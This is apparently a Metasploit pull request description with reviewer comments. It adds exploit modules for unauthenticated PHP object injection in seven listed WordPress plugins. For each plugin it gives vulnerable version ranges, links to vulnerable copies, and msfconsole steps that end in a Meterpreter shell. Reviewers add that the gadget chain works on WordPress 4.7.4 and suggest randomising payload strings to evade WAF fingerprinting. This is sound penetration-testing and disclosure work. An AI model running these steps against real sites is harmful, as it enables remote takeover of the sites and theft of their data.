Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins

[ykoster]

These modules exploit multiple unauthenticated PHP object injection vulnerabilities in various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2).

Affected plugins

Google Forms < 0.91
Ecwid Ecommerce Shopping Cart < 4.4.4
CMS Commander Client < 2.22
InfiniteWP Client < 1.6.1.1
Analytics Stats Counter Statistics (not fixed)
YITH WooCommerce Compare < 2.1.0
Google Analytics Counter Tracker < 3.5.1

Verification

Make sure you're running a WordPress site with one of the affected plugins installed & actived.

Google Forms < 0.91

https://sumofpwn.nl/download/wpgform.0.84.zip

• Start msfconsole
• use exploit/multi/http/wp_google_forms_unserialize
• set RHOST <ip target site>
• set TARGETURI <WordPress path>
• set LHOST <ip of FTP service>
• optionally set RPORT, SSL, and VHOST
• exploit
• Verify a new Meterpreter session is started

Ecwid Ecommerce Shopping Cart < 4.4.4

Requires (free) registation & activation @ Ecwid

https://sumofpwn.nl/download/ecwid-shopping-cart.4.4.zip

• Start msfconsole
• use exploit/multi/http/wp_ecwid_shopping_cart_unserialize
• set RHOST <ip target site>
• set TARGETURI <WordPress path>
• set LHOST <ip of FTP service>
• optionally set RPORT, SSL, and VHOST
• exploit
• Verify a new Meterpreter session is started

CMS Commander Client < 2.22

https://sumofpwn.nl/download/cms-commander-client.2.21.zip

• Start msfconsole
• use exploit/multi/http/wp_cms_commander_client_unserialize
• set RHOST <ip target site>
• set TARGETURI <WordPress path>
• set LHOST <ip of FTP service>
• optionally set RPORT, SSL, and VHOST
• exploit
• Verify a new Meterpreter session is started

InfiniteWP Client < 1.6.1.1

https://sumofpwn.nl/download/iwp-client.zip

• Start msfconsole
• use exploit/multi/http/wp_infinitewp_client_unserialize
• set RHOST <ip target site>
• set TARGETURI <WordPress path>
• set LHOST <ip of FTP service>
• optionally set RPORT, SSL, and VHOST
• exploit
• Verify a new Meterpreter session is started

Analytics Stats Counter Statistics

https://sumofpwn.nl/download/stats-counter.zip

• Start msfconsole
• use exploit/multi/http/wp_analytics_stats_counter_statistics_unserialize
• set RHOST <ip target site>
• set TARGETURI <WordPress path>
• set LHOST <ip of FTP service>
• optionally set RPORT, SSL, and VHOST
• exploit
• Verify a new Meterpreter session is started

YITH WooCommerce Compare < 2.1.0

Requires WooCommerce

https://sumofpwn.nl/download/yith-woocommerce-compare.2.0.9.zip
https://sumofpwn.nl/download/woocommerce.2.6.1.zip

• Start msfconsole
• use exploit/multi/http/wp_yith_woocommerce_compare_unserialize
• set RHOST <ip target site>
• set TARGETURI <WordPress path>
• set LHOST <ip of FTP service>
• optionally set RPORT, SSL, and VHOST
• exploit
• Verify a new Meterpreter session is started

Google Analytics Counter Tracker < 3.5.1

https://sumofpwn.nl/download/analytics-counter.zip

• Start msfconsole
• use exploit/multi/http/wp_google_analytics_counter_tracker_unserialize
• set RHOST <ip target site>
• set TARGETURI <WordPress path>
• set LHOST <ip of FTP service>
• optionally set RPORT, SSL, and VHOST
• exploit
• Verify a new Meterpreter session is started

[wchen-r7]

I think this module needs to be broken down into separate modules.

[ykoster]

@wchen-r7 split in separate modules :)

[ykoster]

FYI, the POP chain still works in WordPress 4.7.4, which was released yesterday

[jvoisin]

Please encode at runtime, with something like Base64.encode64('a:1:{i:0;s:4:"test";}')

[jvoisin]

It could also be interesting to not hardcode the test string, but to use a random one, to bypass idiotic WAF that will fingerprint YToxOntpOjA7czo0OiJ0ZXN0Ijt9.